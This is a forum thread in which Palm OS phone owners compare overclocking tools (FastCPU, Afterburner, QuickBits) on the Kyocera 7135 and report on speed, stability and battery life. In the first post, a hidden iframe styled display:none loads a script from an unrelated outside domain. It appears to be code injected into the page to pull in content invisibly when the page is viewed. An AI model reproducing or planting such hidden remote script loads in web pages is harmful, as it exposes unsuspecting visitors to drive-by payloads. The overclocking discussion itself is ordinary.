+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Over clocking - Once Again.

After many usless attemps at overcloking with my Kyocera, I manage to get an ideal solution. I used FastCPU, and set the "Adjust tick" and "Slow MPX" option to ON. My kyocera is overclocked at 47 Mhz, and I have yet to misse a call.

Will keep you informed, If I do get problems, can you people trie and let me know it I'am dreaming or it's for real ?

I've tried playing with Warcraft Incorporated while overclock and listenting to mp3 and still manage to received a call..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

is this a safe thing to do to the phone (will it shorten the life of the processor)?

I've Over clocked all of my PDA's for the past 5 years (a CLIE N770 and a PalmIIIc) and have not had a single hardware related probleme, however overcloacking can cause certain applications to crash and thus render the PDA unstable.

Administrator
    Originally posted by ewrick
    I've Over clocked all of my PDA's for the past 5 years (a CLIE N770 and a PalmIIIc) and have not had a single hardware related probleme, however overcloacking can cause certain applications to crash and thus render the PDA unstable.
    yep..

heat is a bog factor that shortens the life of electronics.. OC wil cause increased heat and it is a possible situation...
    but in regards to OC, yes it makes the phone environment unsafe.. some people dont have as many problems as other people do.. so YMMV...

Re: Over clocking - Once Again.

Originally posted by ewrick
    After many usless attemps at overcloking with my Kyocera, I manage to get an ideal solution. I used FastCPU, and set the "Adjust tick" and "Slow MPX" option to ON. My kyocera is overclocked at 47 Mhz, and I have yet to misse a call.

Will keep you informed, If I do get problems, can you people trie and let me know it I'am dreaming or it's for real ?

I've tried playing with Warcraft Incorporated while overclock and listenting to mp3 and still manage to received a call..
    Which applications do you have on your phone, and which have you tried so far with overclocking?

Also, how noticeable is the almost 50% increase in speed?

Browser : Avantgo and Blazer (tried)
    PIM : Agendus (tried)
    ContactPro (tried)
    Inbox To Go (tried)
    Chess master (tried)
    Insaniquarium
    GTS racing
    Strategic Commander (tried)
    Astrea
    Documents To Go (tried)
    Datemate
    Isilo (tried)
    ZIPCad
    Idea Pad (tried)
    OmniRemote
    Big Clock
    Splashwallet suit
    Bonzai
    Bobopper (tried)
    Palm VNC
    QuickBits (tried)
    Pi Direct (tried)
    TealLock (tried)

The speed improvment depends on my overclock frequency, but I estimated it to be around 35-40 % increase when doing computer intensive stuff (gams mainly) and I'am overclocked at 47 Mhz.

Also the PDA is more responsive when playing MP3 ... in background.

Whoa. I just loaded FastCPU and boy did things get peppy. Been using this phone since 4/03 so I can notice.

It feels like moving from a 300mhz computer to a P3.

I'm still sceptical as I tried this once before with Afterburner (I think) and things started locking up on me.

So far no problems. Don't know where the tick setting is though. I am using version 3 @40mhz. Verizon's newest flash version.

Very very snappy. It even was faster running at 33mhz.

Apps loaded and tried:
    Snappermail
    Launcherx
    minigolf
    acidimage
    zagat to go
    blazer

just went from 7135 to 6315.

over clocking

I'm using afterburner. I've been running it for over a month now. I'm over clocked at 46mz.

I only seem to have a problem with freezing when i try some hacks. Other wise my phone has been pretty stable.

I'm running
    Snappermail
    Q Office Premier
    backupbuddy ( Please bless them Lord )
    3nity (password keeper)
    Adobe reader
    Benchmark ( showed me my speed gain )
    Bible Reader ( Olive Tree )
    DateBk5
    Supernames
    Dir Assist
    Energy Saver
    FileProg ( free bare bones speedy file manager )
    Handy Shopper
    MessageEase ( love it )
    Minutes Plus beta
    Palmreader
    Smart Launcher (216 button commands, i'm dizzy - but it's cool)
    Shadow Plan
    Tealmaster Demo
    Veo
    Veo Transfer (a must have for Veo)
    Zlauncher

Phone has been very stable. But like a few of you (few, yeah right ) i push the limits of the phone with trials and hacks.

But the overclocking has been noticable and really helps with apps and the mp3's.

Where do you find the "Adjust tick" and "Slow MPX" options in FastCPU please? Installed the program, but do not see these options in Ver 3.0 or in the PDF directions. Have you noticed a significant change in battery life?
    Thanks.

Okay the Adjust Tick and Slow MPX options are only avaible with AfterBurner NOT FastCPU.

That said. I did not noticed a big difference in battery life. I use my Kyo a lot, at the GYmn and in the bus when coming and going to Work. So I do a day on a ful charge at the most.

PS : I bought a hight perfoamnce 256 Meg Sd from Lexar and have not had any skipped in sound when playing 192 Kbs mp3's since. So I no longer need to overclock my Kyo unless I'am playing games

On my 12th PDA phone!
    I have used FastCPU for years on my 6035 and before that my pdQ-800. It is the best overclocking program I have found for Palm OS.

Now, I own a Samsung I700... errrrrrrr.....:anger

I have 5 days to decide to send it back and get a 7135. Yes, I am seriously considering it.
    Convirged since 1999 with a Qualcomm pdQ-800!

Uh,

I'm using Afterburner (not yet registered), and the maximum setting I see under "Default" is 37MHz.

Folks mention overclocking up to 47 - 50MHz.

What am I not understanding, or not doing correctly.

just went from 7135 to 6315.

afterburner

I think that is the max for the unregistered version.

thanks.

I just loaded the *registered* version of afterburner. It is great. The slow cpu in the 7135 was really a step dowm from my clie 665. With afterburner, it seems to now run just a tad slower than the clie 665; which is acceptable.

So far everything seems to work......

also loaded quickkeys. alone it seem to help a little bit. with afterburner, wow.

ps: the unregistered version is basically useless and doesn't give you any flavor of what the app will do.

Afterburner vs. QuickBits

I have Quickbits (www.2bitsoftware.com) loaded and have been running it for a while. Is Afterburner worse/same/better? Quickbits shows that it has increased the speed by 2.26 times. I would appreciate any feedback before I spend the $9 (I know, it's only $9) on Afterburner.

OK, so here's what happened when I activated FastCPU:

Any time I put the phone in its cradle, it locked up, and I had to hit the "Reset" button inside the battery compartment. Tried it 3 times, with the same result each time.

This had never happened previously, and the problem went away when I "deactivated" FastCPU.

Anybody have a similar problem, or any suggestions?

TIA

Re: Afterburner vs. QuickBits

Originally posted by twkellen
    I have Quickbits (www.2bitsoftware.com) loaded and have been running it for a while. Is Afterburner worse/same/better? Quickbits shows that it has increased the speed by 2.26 times. I would appreciate any feedback before I spend the $9 (I know, it's only $9) on Afterburner.

Anyone have any feedback on this?

Re: Re: Afterburner vs. QuickBits

Originally posted by twkellen
    Anyone have any feedback on this?
    QuickBits made my 7135 extremely unstable. Quite a few unexplained crashes, especially when doing a send/fetch with SnapperMail. When I removed QuickBits, the crashes went away, too.
    Michael

There has been a comprehesive discussion reguarding Quckbits. Try doing a seach and it may come up in the archives. I've been running Quickbits for several month (I not running Snapper) and had zero problems. For me it is very stable and speeds up programs that have a heavy graphic interface.

rr

to twkellen:

I found that Quickbits improved speeds modestly for me.

But Afterburner made a real difference. As I have stated in my prior post. The "free" version of Afterburner is basically useless since it only allows overclocking to 39MHz (vs. 33MHz native). Overclock to 49MHz (the max recommended by Afterburner's diagnostic profiling), really sped things up. I can see feel the difference.

That said, I strongly recommend that you (back up first) test all your apps to see which you can overclock and which you should set to normal speed. Some apps will lock up if you overclock. Afterburner allows you to set overclocking by application. This is actually very important. By testing and making the right selections, you'll get faster speed without compromising the stability of your 7135. But this is truly a trial-and-error process.

In summary, I'm buying both Quickbits AND Afterburner.